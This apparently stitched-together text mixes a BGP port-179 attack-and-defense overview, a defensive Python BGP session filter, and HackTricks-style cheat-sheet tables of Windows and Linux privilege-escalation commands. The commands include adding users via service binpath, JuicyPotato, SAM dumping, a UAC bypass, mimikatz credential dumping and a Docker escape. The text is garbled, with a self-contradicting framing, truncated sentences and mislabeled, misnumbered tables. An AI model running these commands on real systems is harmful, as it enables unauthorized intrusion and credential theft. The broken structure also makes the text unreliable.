Below is a concise, structured, and actionable compilation of 179 practical offensive-security techniques, tools, and workflows inspired by common pentesting references and aggregated best practices. Each entry includes a short description, when to use it, and concise actionable steps or commands. Use responsibly and only on systems you own or are authorized to test.
The request references port 179, the default port for the Border Gateway Protocol (BGP), often discussed in cybersecurity guides like HackTricks. BGP is a critical protocol used to exchange routing information between autonomous systems on the internet. Because of its importance, it is a high-value target for attacks like route hijacking and DoS.

Below is a draft piece structured as a technical overview for securing or assessing this port.

Technical Overview: Port 179 (BGP) Exploitation & Defense

1. The Role of Port 179

- Border Gateway Protocol (BGP): facilitates the exchange of routing information between large networks (ASNs).
- Default state: typically filtered and only open to specific, trusted peering partners.

2. Key Vulnerabilities & Attack Vectors

- Route hijacking: maliciously announcing IP prefixes that do not belong to you, causing traffic to be diverted to your infrastructure.
- Session reset/DoS: sending spoofed TCP packets (e.g., floods) to tear down BGP peering sessions, leading to massive network instability.
- MD5 password cracking: if peering sessions use MD5 authentication, attackers may capture handshake packets and attempt to crack the password offline using tools like

3. Assessment Checklist (The "HackTricks" Approach)

- Footprinting: identify BGP speakers by scanning port 179; if it is open, the target is likely a router or edge device.
- Information gathering: AS numbers and neighbors. Tools like can be used to simulate peering.
- Authentication check: verify whether MD5 signatures are enforced on the TCP session. Without them, session hijacking is significantly easier.

4. Mitigation Strategies

- Access Control Lists (ACLs): restrict port 179 access strictly to the IP addresses of known peering partners.
- BGP Route Origin Validation (ROV): used to verify the origin of a route announcement and prevent hijacking.
- Control Plane Policing (CoPP): use CoPP to rate-limit traffic destined for the router's CPU to prevent DoS via port 179.
- TTL Security (GTSM): use the Generalized TTL Security Mechanism (RFC 5082) to reject BGP packets that did not originate from a directly connected neighbor.

HackTricks
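The three session-level mitigations above (peer ACL, GTSM per RFC 5082, and an enforced MD5 session signature) combine into a single admission check on inbound SYNs to port 179. The block below is an added example written for this page, not HackTricks code; the `SynMeta` record, its field names and the sample peer addresses are constructed assumptions rather than a real capture format.

```python
"""Admission policy for inbound BGP (TCP/179) session attempts.

Models the mitigations listed above as one filter a control-plane guard
could apply to TCP SYN metadata. Record layout is an assumption.
"""
from dataclasses import dataclass
from ipaddress import ip_address

BGP_PORT = 179
GTSM_MAX_TTL = 255  # RFC 5082: a directly connected peer sends TTL 255


@dataclass(frozen=True)
class PeerPolicy:
    allowed_peers: frozenset   # ACL: addresses permitted to open sessions to port 179
    gtsm_hops: int = 1         # accept only if TTL >= 255 - (hops - 1)
    require_md5: bool = True   # TCP MD5 signature option (RFC 2385) must be present


@dataclass(frozen=True)
class SynMeta:                 # assumed shape of one inbound SYN, not a real capture type
    src: str
    dst_port: int
    ttl: int
    has_md5_option: bool


def make_policy(peers, hops=1, md5=True):
    """Build a policy from peer address strings (normalised via ipaddress)."""
    return PeerPolicy(frozenset(ip_address(p) for p in peers), hops, md5)


def check_bgp_syn(pkt: SynMeta, policy: PeerPolicy) -> tuple:
    """Return (accept, reason); checks are ordered ACL -> GTSM -> MD5."""
    if pkt.dst_port != BGP_PORT:
        return True, "not BGP traffic; outside this policy"
    if ip_address(pkt.src) not in policy.allowed_peers:
        return False, "ACL: source is not a configured peer"
    # GTSM: a peer 'hops' away delivers TTL no lower than 255 - (hops - 1);
    # a lower TTL means the packet came from further away (e.g. spoofed remotely).
    if pkt.ttl < GTSM_MAX_TTL - (policy.gtsm_hops - 1):
        return False, f"GTSM: TTL {pkt.ttl} below expected minimum"
    if policy.require_md5 and not pkt.has_md5_option:
        return False, "MD5: TCP signature option missing"
    return True, "accepted"


POLICY = make_policy(["192.0.2.1"])            # constructed: one directly connected peer
SAMPLE_SYNS = [                                # constructed sample records, not captured traffic
    SynMeta("192.0.2.1", 179, 255, True),      # legitimate peer
    SynMeta("192.0.2.1", 179, 253, True),      # peer address, but TTL shows extra hops
    SynMeta("198.51.100.7", 179, 255, True),   # not in the peer ACL
    SynMeta("192.0.2.1", 179, 255, False),     # peer without MD5 signature
    SynMeta("198.51.100.7", 443, 60, False),   # unrelated service, not BGP
]


def audit(syns=SAMPLE_SYNS, policy=POLICY):
    """Evaluate each SYN and return (src, accepted, reason) triples."""
    return [(p.src, *check_bgp_syn(p, policy)) for p in syns]
```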
Since "179" is not a standard chapter number in the official HackTricks book (which is organized by technology like Linux, Windows, Cloud, etc.), I will provide a comprehensive write-up on what HackTricks is, why it is considered the "best" resource for security professionals, and highlight some of the specific techniques that are often cited as "best" or "top-tier" (which might correspond to high-ranking entries on bookmark lists).
Here is a write-up on the topic.
In the world of cybersecurity, specifically within the domains of Penetration Testing, Red Teaming, and Bug Bounty hunting, few resources are as ubiquitous and revered as HackTricks.
Maintained primarily by Carlos Polop, HackTricks is an open-source encyclopedia of security attack patterns, techniques, and command-line snippets. It serves as a "cheat sheet" on steroids, bridging the gap between theoretical knowledge and practical execution.
If one were to curate a list of the "Best" hacks within the book, they typically fall into the category of Local Privilege Escalation (LPE). These are the moments during an engagement where a tester moves from a low-privilege user (like www-data) to root or SYSTEM.
| # | Trick | Command / Technique |
|---|-------|----------------------|
| 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer |
| 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode |
| 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" |
| 34 | SeImpersonate (Potato family) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" |
| 35 | Saved RDP credentials | cmdkey /list → runas /savecred |
| 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save |
| 37 | Writable %PATH% folders | where.exe check + drop whoami.exe |
| 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe |
| 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command |
| 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" |
| ... | ... | ... |
| 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |
Web hacking can be infinite, but the "179 best" list focuses on high-impact, low-hanging fruit.
| # | Trick | Command / Technique |
|---|-------|----------------------|
| 1 | Find SUID binaries | find / -perm -4000 2>/dev/null |
| 2 | Exploit writable /etc/passwd | openssl passwd -1 -salt hacker password → add entry |
| 3 | Sudo abuse (CVE-2021-3156) | sudoedit -s / |
| 4 | LD_PRELOAD injection | Compile malicious .so → LD_PRELOAD=./mal.so ./suid_bin |
| 5 | Docker group escape | docker run -v /:/mnt -it alpine |
| 6 | Cron job wildcard injection | Write to /etc/cron.hourly/ with wildcard commands |
| 7 | PATH hijacking | PATH=.:$PATH then create malicious ls |
| 8 | NFS no_root_squash | mount -o rw,vers=2 and write SUID |
| 9 | Capabilities – CAP_SETUID | ./binary -p to spawn root shell |
| 10 | LXD group abuse | lxc init alpine -c security.privileged=true |
| ... | ... | ... |
| 30 | Kernel exploits (check distro) | uname -a → searchsploit |